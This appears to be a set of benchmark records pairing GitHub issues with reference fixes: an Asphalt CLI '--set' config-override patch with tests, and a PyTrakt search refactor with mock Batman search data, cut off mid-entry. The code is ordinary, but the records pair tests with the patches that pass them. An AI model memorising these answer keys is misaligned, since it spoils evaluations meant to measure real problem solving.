+ The logging level for the ``asphalt.templating`` logger will be set to ``DEBUG``.
+
+The same effect can be achieved programmatically by supplying the override configuration to the
+container component via its ``components`` constructor argument. This is very useful when writing
+tests against your application. For example, you might want to use the ``mock`` mailer in your test
+suite configuration to test that the application correctly sends out emails (and to prevent them
+from actually being sent to recipients!).
There is another neat trick that lets you easily modify a specific key in the configuration.
By using dotted notation in a configuration key, you can target a specific key arbitrarily deep in
diff --git a/src/asphalt/core/cli.py b/src/asphalt/core/cli.py
index 3f4c02d..b1823e5 100644
--- a/src/asphalt/core/cli.py
+++ b/src/asphalt/core/cli.py
@@ -1,8 +1,10 @@
from __future__ import annotations
import os
+import re
+from collections.abc import Mapping
from pathlib import Path
-from typing import Any, Dict, Optional
+from typing import Any, Dict, List, Optional
import click
from ruamel.yaml import YAML, ScalarNode
@@ -52,7 +54,20 @@ def main() -> None:
type=str,
help="service to run (if the configuration file contains multiple services)",
)
-def run(configfile, unsafe: bool, loop: Optional[str], service: Optional[str]) -> None:
+@click.option(
+ "--set",
+ "set_",
+ multiple=True,
+ type=str,
+ help="set configuration",
+)
+def run(
+ configfile,
+ unsafe: bool,
+ loop: Optional[str],
+ service: Optional[str],
+ set_: List[str],
+) -> None:
yaml = YAML(typ="unsafe" if unsafe else "safe")
yaml.constructor.add_constructor("!Env", env_constructor)
yaml.constructor.add_constructor("!TextFile", text_file_constructor)
@@ -67,6 +82,28 @@ def run(configfile, unsafe: bool, loop: Optional[str], service: Optional[str]) -
), "the document root element must be a dictionary"
config = merge_config(config, config_data)
+ # Override config options
+ for override in set_:
+ if "=" not in override:
+ raise click.ClickException(
+ f"Configuration must be set with '=', got: {override}"
+ )
+
+ key, value = override.split("=", 1)
+ parsed_value = yaml.load(value)
+ keys = [k.replace(r"\.", ".") for k in re.split(r"(?<!\\)\.", key)]
+ section = config
+ for i, part_key in enumerate(keys[:-1]):
+ section = section.setdefault(part_key, {})
+ if not isinstance(section, Mapping):
+ path = " ⟶ ".join(x for x in keys[: i + 1])
+ raise click.ClickException(
+ f"Cannot apply override for {key!r}: value at {path} is not "
+ f"a mapping, but {qualified_name(section)}"
+ )
+
+ section[keys[-1]] = parsed_value
+
# Override the event loop policy if specified
if loop:
config["event_loop_policy"] = loop
|
asphalt-framework/asphalt
|
39ff21a7aa0785f7cdb28eebabd011277080f108
|
diff --git a/tests/test_cli.py b/tests/test_cli.py
index c8c22f6..02247a9 100644
--- a/tests/test_cli.py
+++ b/tests/test_cli.py
@@ -88,6 +88,38 @@ logging:
}
+def test_run_bad_override(runner: CliRunner) -> None:
+ config = """\
+ component:
+ type: does.not.exist:Component
+"""
+ with runner.isolated_filesystem():
+ Path("test.yml").write_text(config)
+ result = runner.invoke(cli.run, ["test.yml", "--set", "foobar"])
+ assert result.exit_code == 1
+ assert result.stdout == (
+ "Error: Configuration must be set with '=', got: foobar\n"
+ )
+
+
+def test_run_bad_path(runner: CliRunner) -> None:
+ config = """\
+ component:
+ type: does.not.exist:Component
+ listvalue: []
+"""
+ with runner.isolated_filesystem():
+ Path("test.yml").write_text(config)
+ result = runner.invoke(
+ cli.run, ["test.yml", "--set", "component.listvalue.foo=1"]
+ )
+ assert result.exit_code == 1
+ assert result.stdout == (
+ "Error: Cannot apply override for 'component.listvalue.foo': value at "
+ "component ⟶ listvalue is not a mapping, but list\n"
+ )
+
+
def test_run_multiple_configs(runner: CliRunner) -> None:
component_class = "{0.__module__}:{0.__name__}".format(DummyComponent)
config1 = """\
@@ -106,6 +138,7 @@ logging:
component:
dummyval1: alternate
dummyval2: 10
+ dummyval3: foo
"""
with runner.isolated_filesystem(), patch(
@@ -113,7 +146,17 @@ component:
) as run_app:
Path("conf1.yml").write_text(config1)
Path("conf2.yml").write_text(config2)
- result = runner.invoke(cli.run, ["conf1.yml", "conf2.yml"])
+ result = runner.invoke(
+ cli.run,
+ [
+ "conf1.yml",
+ "conf2.yml",
+ "--set",
+ "component.dummyval3=bar",
+ "--set",
+ "component.dummyval4=baz",
+ ],
+ )
assert result.exit_code == 0
assert run_app.call_count == 1
@@ -124,6 +167,8 @@ component:
"type": component_class,
"dummyval1": "alternate",
"dummyval2": 10,
+ "dummyval3": "bar",
+ "dummyval4": "baz",
},
"logging": {"version": 1, "disable_existing_loggers": False},
}
|
Configuration through the command line
Asphalt can currently be configured through YAML files, but it would be great to also support configuration through CLI arguments and options that would take precedence over YAML files.
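
The patch above adds this as a repeatable `--set path.to.key=value` option on `asphalt run`. A condensed hedged sketch of the override logic it applies (simplified: the real code also YAML-parses the value and reports errors through click exceptions):

```python
import re


def apply_override(config: dict, override: str) -> None:
    """Apply one 'dotted.path=value' override to a nested configuration dict."""
    if "=" not in override:
        raise ValueError(f"Configuration must be set with '=', got: {override}")
    key, value = override.split("=", 1)
    # Split on dots that are not escaped with a backslash, then unescape them.
    keys = [part.replace(r"\.", ".") for part in re.split(r"(?<!\\)\.", key)]
    section = config
    for part in keys[:-1]:
        section = section.setdefault(part, {})
    section[keys[-1]] = value


config = {"component": {"type": "does.not.exist:Component"}}
apply_override(config, "component.dummyval3=bar")
# config == {"component": {"type": "does.not.exist:Component", "dummyval3": "bar"}}
```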
|
0.0
|
39ff21a7aa0785f7cdb28eebabd011277080f108
|
[
"tests/test_cli.py::test_run_bad_override",
"tests/test_cli.py::test_run_bad_path",
"tests/test_cli.py::test_run_multiple_configs"
] |
[
"tests/test_cli.py::test_run[safe-default]",
"tests/test_cli.py::test_run[safe-override]",
"tests/test_cli.py::test_run[unsafe-default]",
"tests/test_cli.py::test_run[unsafe-override]",
"tests/test_cli.py::TestServices::test_run_service[server]",
"tests/test_cli.py::TestServices::test_run_service[client]",
"tests/test_cli.py::TestServices::test_service_not_found",
"tests/test_cli.py::TestServices::test_no_service_selected",
"tests/test_cli.py::TestServices::test_bad_services_type",
"tests/test_cli.py::TestServices::test_no_services_defined",
"tests/test_cli.py::TestServices::test_run_only_service",
"tests/test_cli.py::TestServices::test_run_default_service",
"tests/test_cli.py::TestServices::test_service_env_variable",
"tests/test_cli.py::TestServices::test_service_env_variable_override"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-21 13:35:39+00:00
|
apache-2.0
| 1,209
|
|
moogar0880__PyTrakt-108
|
diff --git a/HISTORY.rst b/HISTORY.rst
index 250fe12..cbd7617 100644
--- a/HISTORY.rst
+++ b/HISTORY.rst
@@ -1,5 +1,10 @@
Release History
^^^^^^^^^^^^^^^
+2.10.0 (2019-06-25)
++++++++++++++++++++
+
+* Add the ability to return a list of search results instead of their underlying media types (#106)
+
2.9.1 (2019-02-24)
++++++++++++++++++
diff --git a/trakt/__init__.py b/trakt/__init__.py
index f1b1d1e..c731ff7 100644
--- a/trakt/__init__.py
+++ b/trakt/__init__.py
@@ -5,6 +5,6 @@ try:
except ImportError:
pass
-version_info = (2, 9, 1)
+version_info = (2, 10, 0)
__author__ = 'Jon Nappi'
__version__ = '.'.join([str(i) for i in version_info])
diff --git a/trakt/sync.py b/trakt/sync.py
index 39aee61..4e89700 100644
--- a/trakt/sync.py
+++ b/trakt/sync.py
@@ -114,48 +114,64 @@ def remove_from_collection(media):
yield 'sync/collection/remove', media.to_json()
-@get
def search(query, search_type='movie', year=None):
"""Perform a search query against all of trakt's media types
:param query: Your search string
:param search_type: The type of object you're looking for. Must be one of
'movie', 'show', 'episode', or 'person'
+ :param year: This parameter is ignored as it is no longer a part of the
+ official API. It is left here as a valid arg for backwards
+ compatability.
"""
- valids = ('movie', 'show', 'episode', 'person')
- if search_type not in valids:
- raise ValueError('search_type must be one of {}'.format(valids))
- uri = 'search?query={query}&type={type}'.format(
- query=slugify(query), type=search_type)
+ # the new get_search_results expects a list of types, so handle this
+ # conversion to maintain backwards compatability
+ if isinstance(search_type, str):
+ search_type = [search_type]
+ results = get_search_results(query, search_type)
+ return [result.media for result in results]
+
+
+@get
+def get_search_results(query, search_type=None):
+ """Perform a search query against all of trakt's media types
- if year is not None:
- uri += '&year={}'.format(year)
+ :param query: Your search string
+ :param search_type: The types of objects you're looking for. Must be
+ specified as a list of strings containing any of 'movie', 'show',
+ 'episode', or 'person'.
+ """
+ # if no search type was specified, then search everything
+ if search_type is None:
+ search_type = ['movie', 'show', 'episode', 'person']
+ uri = 'search/{type}?query={query}'.format(
+ query=slugify(query), type=','.join(search_type))
data = yield uri
+ # Need to do imports here to prevent circular imports with modules that
+ # need to import Scrobblers
+ results = []
for media_item in data:
extract_ids(media_item)
+ result = SearchResult(media_item['type'], media_item['score'])
+ if media_item['type'] == 'movie':
+ from trakt.movies import Movie
+ result.media = Movie(**media_item.pop('movie'))
+ elif media_item['type'] == 'show':
+ from trakt.tv import TVShow
+ result.media = TVShow(**media_item.pop('show'))
+ elif media_item['type'] == 'episode':
+ from trakt.tv import TVEpisode
+ show = media_item.pop('show')
+ result.media = TVEpisode(show.get('title', None),
+ **media_item.pop('episode'))
+ elif media_item['type'] == 'person':
+ from trakt.people import Person
+ result.media = Person(**media_item.pop('person'))
+ results.append(result)
- # Need to do imports here to prevent circular imports with modules that
- # need to import Scrobblers
- if search_type == 'movie':
- from trakt.movies import Movie
- yield [Movie(**d.pop('movie')) for d in data]
- elif search_type == 'show':
- from trakt.tv import TVShow
- yield [TVShow(**d.pop('show')) for d in data]
- elif search_type == 'episode':
- from trakt.tv import TVEpisode
- episodes = []
- for episode in data:
- show = episode.pop('show')
- extract_ids(episode['episode'])
- episodes.append(TVEpisode(show.get('title', None),
- **episode['episode']))
- yield episodes
- elif search_type == 'person':
- from trakt.people import Person
- yield [Person(**d.pop('person')) for d in data]
+ yield results
@get
@@ -269,3 +285,20 @@ class Scrobbler(object):
scrobbling the :class:`Scrobller`'s *media* object
"""
self.finish()
+
+
+class SearchResult(object):
+ """A SearchResult is an individual result item from the trakt.tv search
+ API. It wraps a single media entity whose type is indicated by the type
+ field.
+ """
+ def __init__(self, type, score, media=None):
+ """Create a new :class:`SearchResult` instance
+
+ :param type: The type of media object contained in this result.
+ :param score: The search result relevancy score of this item.
+ :param media: The wrapped media item returned by a search.
+ """
+ self.type = type
+ self.score = score
+ self.media = media
|
moogar0880/PyTrakt
|
490b465291cb546a903160007aa2eacc85cd4d7c
|
diff --git a/tests/mock_data/search.json b/tests/mock_data/search.json
index 8bd87b2..1cd4a2c 100644
--- a/tests/mock_data/search.json
+++ b/tests/mock_data/search.json
@@ -1,36 +1,21 @@
{
- "search?query=batman&type=movie": {
+ "search/movie?query=batman": {
"GET": [
{"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dark Knight of Gotham City begins his war on crime with his first major enemy being the clownishly homicidal Joker, who has seized control of Gotham's underworld.","year":1989,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/000/224/posters/original/8a5816fc0b.jpg","medium":"https://walter.trakt.us/images/movies/000/000/224/posters/medium/8a5816fc0b.jpg","thumb":"https://walter.trakt.us/images/movies/000/000/224/posters/thumb/8a5816fc0b.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/000/224/fanarts/original/cbc5557201.jpg","medium":"https://walter.trakt.us/images/movies/000/000/224/fanarts/medium/cbc5557201.jpg","thumb":"https://walter.trakt.us/images/movies/000/000/224/fanarts/thumb/cbc5557201.jpg"}},"ids":{"trakt":224,"slug":"batman-1989","imdb":"tt0096895","tmdb":268}}},
{"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dynamic Duo faces four super-villains who plan to hold the world for ransom with the help of a secret invention that instantly dehydrates people.","year":1966,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/001/794/posters/original/4a4f6031b0.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/posters/medium/4a4f6031b0.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/posters/thumb/4a4f6031b0.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/001/794/fanarts/original/493d7c70a3.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/fanarts/medium/493d7c70a3.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/fanarts/thumb/493d7c70a3.jpg"}},"ids":{"trakt":1794,"slug":"batman-1966","imdb":"tt0060153","tmdb":2661}}}
]
},
- "search?query=batman&type=movie&year=1966": {
- "GET": [
- {"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dynamic Duo faces four super-villains who plan to hold the world for ransom with the help of a secret invention that instantly dehydrates people.","year":1966,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/001/794/posters/original/4a4f6031b0.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/posters/medium/4a4f6031b0.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/posters/thumb/4a4f6031b0.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/001/794/fanarts/original/493d7c70a3.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/fanarts/medium/493d7c70a3.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/fanarts/thumb/493d7c70a3.jpg"}},"ids":{"trakt":1794,"slug":"batman-1966","imdb":"tt0060153","tmdb":2661}}}
- ]
- },
- "search?query=batman&type=show": {
+ "search/show?query=batman": {
"GET": [
{"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/273/posters/medium/6a2568c755.jpg", "full": "https://walter.trakt.us/images/shows/000/002/273/posters/original/6a2568c755.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/273/posters/thumb/6a2568c755.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/273/fanarts/medium/7d42efbf73.jpg", "full": "https://walter.trakt.us/images/shows/000/002/273/fanarts/original/7d42efbf73.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/273/fanarts/thumb/7d42efbf73.jpg"}}, "ids": {"trakt": 2273, "tvrage": 2719, "tvdb": 77871, "slug": "batman", "imdb": "tt0059968", "tmdb": 2287}, "overview": "Wealthy entrepreneur Bruce Wayne and his ward Dick Grayson lead a double life: they are actually crime fighting duo Batman and Robin. A secret Batpole in the Wayne mansion leads to the Batcave, where Police Commissioner Gordon often calls with the latest emergency threatening Gotham City. Racing the the scene of the crime in the Batmobile, Batman and Robin must (with the help of their trusty Bat-utility-belt) thwart the efforts of a variety of master criminals, including The Riddler, The Joker, Catwoman, and The Penguin.", "title": "Batman", "year": 1966, "status": "ended"}, "score": 78.2283}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/512/posters/medium/e953162fe9.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/posters/original/e953162fe9.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/posters/thumb/e953162fe9.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/512/fanarts/medium/d6792a2797.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/fanarts/original/d6792a2797.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/fanarts/thumb/d6792a2797.jpg"}}, "ids": {"trakt": 512, "tvrage": 2722, "tvdb": 75417, "slug": "batman-beyond", "imdb": "tt0147746", "tmdb": 513}, "overview": "It's been years since Batman was last seen and Bruce Wayne secludes himself away from the resurgence of crime in Gotham. After discovering Bruce's secret identity, troubled teenager Terry McGinnis dons the mantle of Batman. With Bruce supervising him, Terry battles criminals in a futuristic Gotham and brings hope to its citizens.", "title": "Batman Beyond", "year": 1999, "status": "ended"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/009/posters/medium/09023ee66d.jpg", "full": "https://walter.trakt.us/images/shows/000/002/009/posters/original/09023ee66d.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/009/posters/thumb/09023ee66d.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/009/fanarts/medium/256651c6be.jpg", "full": "https://walter.trakt.us/images/shows/000/002/009/fanarts/original/256651c6be.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/009/fanarts/thumb/256651c6be.jpg"}}, "ids": {"trakt": 2009, "tvrage": 5602, "tvdb": 73180, "slug": "the-batman", "imdb": "tt0398417", "tmdb": 2022}, "overview": "A young Bruce Wayne is in his third year of trying to establish himself as Batman, protector of Gotham City. He is in his mid-twenties, just finding his way as protector, defender and Caped Crusader, while balancing his public persona as billionaire bachelor Bruce Wayne. 
Living in Gotham, a metropolis where shadows run long and deep, beneath elevated train tracks, this younger Batman will confront updated takes of familiar foes - meeting each member of his classic Rogue\"s Gallery for the first time. From the likes of Joker, Penguin, Catwoman, Mr. Freeze, Riddler and Man-Bat, among others, the war on crime jumps to the next level with a new arsenal at the Dark Knight\"s disposal, all operated and linked by an advanced remote-controlled invention he dubs the \"Bat-Wave.\" ", "title": "The Batman", "year": 2004, "status": "ended"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 102664, "tvrage": null, "tvdb": 301558, "slug": "batman-unlimited", "imdb": null, "tmdb": null}, "overview": "A webseries began airing on DC Kids' YouTube channel on May 4, 2015.", "title": "Batman Unlimited", "year": 2015, "status": "returning series"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/081/374/posters/medium/9f2c978ded.jpg", "full": "https://walter.trakt.us/images/shows/000/081/374/posters/original/9f2c978ded.jpg", "thumb": "https://walter.trakt.us/images/shows/000/081/374/posters/thumb/9f2c978ded.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/081/374/fanarts/medium/9f2c978ded.jpg", "full": "https://walter.trakt.us/images/shows/000/081/374/fanarts/original/9f2c978ded.jpg", "thumb": "https://walter.trakt.us/images/shows/000/081/374/fanarts/thumb/9f2c978ded.jpg"}}, "ids": {"trakt": 81374, "tvrage": null, "tvdb": 287484, "slug": "lego-batman", "imdb": null, "tmdb": null}, "overview": "Batman prides himself on being a loner, a totally self sufficient one-man band. He is understandably irritated when his nightly cleanup of Gotham City villains is interrupted by Superman, who pesters Batman to join his new Super-Hero team, the Justice League. After Batman makes it quite clear to the Man of Steel that his invitation has been declined, Superman flies off disappointed … whereupon he is overcome with a strange energy and vanishes! As costumed Super-Villains begin vanishing one-by-one at the hand of a mysterious enemy, the Dark Knight must free the newly-formed Justice League from a powerful foe. But can Batman learn the value of being a team-player before the Justice League is lost forever?", "title": "Lego Batman", "year": 2014, "status": "returning series"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/041/472/posters/medium/3211da0751.jpg", "full": "https://walter.trakt.us/images/shows/000/041/472/posters/original/3211da0751.jpg", "thumb": "https://walter.trakt.us/images/shows/000/041/472/posters/thumb/3211da0751.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/041/472/fanarts/medium/cda4ae8fab.jpg", "full": "https://walter.trakt.us/images/shows/000/041/472/fanarts/original/cda4ae8fab.jpg", "thumb": "https://walter.trakt.us/images/shows/000/041/472/fanarts/thumb/cda4ae8fab.jpg"}}, "ids": {"trakt": 41472, "tvrage": null, "tvdb": 258331, "slug": "beware-the-batman", "imdb": "", "tmdb": 41676}, "overview": "The series is set during Bruce Wayne's early years as the Batman, following his initial period of battling organized crime. Over the course of the season, he hones his skills with the assistance of his butler, Alfred Pennyworth. 
Bruce is introduced to Alfred's goddaughter, Tatsu Yamashiro. Tatsu is a martial arts swordsmaster hired to act as Bruce's bodyguard, but also recruited to act as a superhero partner to Batman.", "title": "Beware the Batman", "year": 2013, "status": "returning series"}, "score": 44.701885}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/085/posters/medium/391f332b37.jpg", "full": "https://walter.trakt.us/images/shows/000/002/085/posters/original/391f332b37.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/085/posters/thumb/391f332b37.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/085/fanarts/medium/ab8d2d1b46.jpg", "full": "https://walter.trakt.us/images/shows/000/002/085/fanarts/original/ab8d2d1b46.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/085/fanarts/thumb/ab8d2d1b46.jpg"}}, "ids": {"trakt": 2085, "tvrage": 2721, "tvdb": 76168, "slug": "batman-the-animated-series", "imdb": "tt0103359", "tmdb": 2098}, "overview": "Batman The Animated Series was a cartoon that premiered on September 5, 1992, based on the comic series created by Bob Kane, as well as the Burton movie adaptations. The series focused on the adventures of the alter ego of millionaire Bruce Wayne, Batman, a dark vigilante hero who defends Gotham City from a variety of creative and psychotic villains. The highly successful series merged stylish animation and fantastic storytelling more in the style of radio plays than typical cartoons.", "title": "Batman: The Animated Series", "year": 1992, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/004/601/posters/medium/56bb90f61e.jpg", "full": "https://walter.trakt.us/images/shows/000/004/601/posters/original/56bb90f61e.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/601/posters/thumb/56bb90f61e.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/004/601/fanarts/medium/a3ee2e1ec3.jpg", "full": "https://walter.trakt.us/images/shows/000/004/601/fanarts/original/a3ee2e1ec3.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/601/fanarts/thumb/a3ee2e1ec3.jpg"}}, "ids": {"trakt": 4601, "tvrage": null, "tvdb": 77084, "slug": "the-new-batman-adventures", "imdb": "tt0118266", "tmdb": 4625}, "overview": "Also known as Batman Gotham Knights, this series takes place two years after the last episode of Batman: The Animated Series. Batman has continued to fight crime in Gotham City, but there have been some changes. Dick Grayson has become Nightwing; Tim Drake has taken over the role of Robin; and Batgirl has become apart of Batman's team. But the Dark Knight's greatest villains continue to plague Gotham City, so not everything has changed. This series aired alongside Superman as part of The New Batman/Superman Adventures on the WB. 
First Telecast: September 13, 1997Last Telecast: January 16, 1999 Episodes: 24 Color episodes (24 half-hour episodes, 2 Direct-to Video Movies) ", "title": "The New Batman Adventures", "year": 1997, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/031/611/posters/medium/d969363d90.jpg", "full": "https://walter.trakt.us/images/shows/000/031/611/posters/original/d969363d90.jpg", "thumb": "https://walter.trakt.us/images/shows/000/031/611/posters/thumb/d969363d90.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/031/611/fanarts/medium/66fab2b401.jpg", "full": "https://walter.trakt.us/images/shows/000/031/611/fanarts/original/66fab2b401.jpg", "thumb": "https://walter.trakt.us/images/shows/000/031/611/fanarts/thumb/66fab2b401.jpg"}}, "ids": {"trakt": 31611, "tvrage": null, "tvdb": 248509, "slug": "the-adventures-of-batman", "imdb": "tt0062544", "tmdb": 31749}, "overview": "The adventures of Batman, with Robin, the Boy Wonder!Batman and Robin, the Dynamic Duo against crime and corruption, whose real identities as millionaire philanthropist Bruce Wayne and his young ward Dick Grayson and known only to Alfred, the faithful butler.Ever alert, they respond swiftly to a signal from the police, and moments later, from the secret Batcave deep beneath Wayne Manor, they roar out to protect life, limb and property as Batman and Robin, caped crimefighters!Batman and Robin, scourge of Gotham City's kooky criminals: The Joker, Clown Prince of Crime - The Penguin, pudgy purveyor of perfidy - and the cool, cruel, Mr. Freeze!Watch out, villains, here come... Batman and Robin!", "title": "The Adventures of Batman", "year": 1968, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/061/637/posters/medium/a889cb95b2.jpg", "full": "https://walter.trakt.us/images/shows/000/061/637/posters/original/a889cb95b2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/061/637/posters/thumb/a889cb95b2.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/061/637/fanarts/medium/d873f0ed83.jpg", "full": "https://walter.trakt.us/images/shows/000/061/637/fanarts/original/d873f0ed83.jpg", "thumb": "https://walter.trakt.us/images/shows/000/061/637/fanarts/thumb/d873f0ed83.jpg"}}, "ids": {"trakt": 61637, "tvrage": null, "tvdb": 93341, "slug": "batman-the-1943-serial", "imdb": "tt0035665", "tmdb": null}, "overview": "Batman was a 15-chapter serial released in 1943 by Columbia Pictures. The serial starred Lewis Wilson as Batman and Douglas Croft as Robin. J. Carrol Naish played the villain, an original character named Dr. Daka. Rounding out the cast were Shirley Patterson as Linda Page (Bruce Wayne's love interest), and William Austin as Alfred. The plot is based on Batman, a US government agent, attempting to defeat the Japanese agent Dr. Daka, at the height of World War II.", "title": "Batman: The 1943 Serial", "year": 1943, "status": "ended"}, "score": 39.11415}
]
},
- "search?query=batman&type=show&year=1999": {
- "GET": [
- {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/512/posters/medium/e953162fe9.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/posters/original/e953162fe9.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/posters/thumb/e953162fe9.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/512/fanarts/medium/d6792a2797.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/fanarts/original/d6792a2797.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/fanarts/thumb/d6792a2797.jpg"}}, "ids": {"trakt": 512, "tvrage": 2722, "tvdb": 75417, "slug": "batman-beyond", "imdb": "tt0147746", "tmdb": 513}, "overview": "It's been years since Batman was last seen and Bruce Wayne secludes himself away from the resurgence of crime in Gotham. After discovering Bruce's secret identity, troubled teenager Terry McGinnis dons the mantle of Batman. With Bruce supervising him, Terry battles criminals in a futuristic Gotham and brings hope to its citizens.", "title": "Batman Beyond", "year": 1999, "status": "ended"}, "score": 55.877357}
- ]
- },
- "search?query=batman&type=episode": {
+ "search/episode?query=batman": {
"GET": [
{"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/900/posters/medium/d67bbc0a62.jpg", "full": "https://walter.trakt.us/images/shows/000/000/900/posters/original/d67bbc0a62.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/900/posters/thumb/d67bbc0a62.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/900/fanarts/medium/1eae79bc72.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/000/900/fanarts/thumb/1eae79bc72.jpg"}}, "year": "1987", "ids": {"trakt": 900, "slug": "french-saunders"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/medium/5bd7342a6a.jpg", "full": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/original/5bd7342a6a.jpg", "thumb": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/thumb/5bd7342a6a.jpg"}}, "title": "Batman", "season": 5, "number": 4, "ids": {"trakt": 59025, "tvrage": 64781, "tmdb": null, "imdb": "", "tvdb": 165596}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/063/200/posters/medium/4f5ec381c4.jpg", "full": "https://walter.trakt.us/images/shows/000/063/200/posters/original/4f5ec381c4.jpg", "thumb": "https://walter.trakt.us/images/shows/000/063/200/posters/thumb/4f5ec381c4.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/063/200/fanarts/medium/4f5ec381c4.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/063/200/fanarts/thumb/4f5ec381c4.jpg"}}, "year": "2008", "ids": {"trakt": 63200, "slug": "hey-ash-whatcha-playin"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/medium/5f6e4ee8fe.jpg", "full": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/original/5f6e4ee8fe.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/thumb/5f6e4ee8fe.jpg"}}, "ids": {"trakt": 1058895, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4412148}, "overview": "Arkham's criminals don't stand a chance against the world's greatest detective, Ashly Burch.", "number": 15, "season": 4, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/004/968/posters/medium/beec80b1c2.jpg", "full": "https://walter.trakt.us/images/shows/000/004/968/posters/original/beec80b1c2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/968/posters/thumb/beec80b1c2.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/004/968/fanarts/medium/0918fab718.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/004/968/fanarts/thumb/0918fab718.jpg"}}, "ids": {"trakt": 4968, "slug": "biography"}, "year": "1987", "title": "Biography"}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 1617094, "tvrage": null, "tmdb": 0, "imdb": null, "tvdb": 4358502}, "overview": "A history of the campy classic '60s TV series \"Batman\", starring Adam West and Burt Ward, who are on hand to comment. Included: screen tests and clips of memorable scenes. Also commenting is executive producer William Dozier; and Batmobile customizer George Barris. 
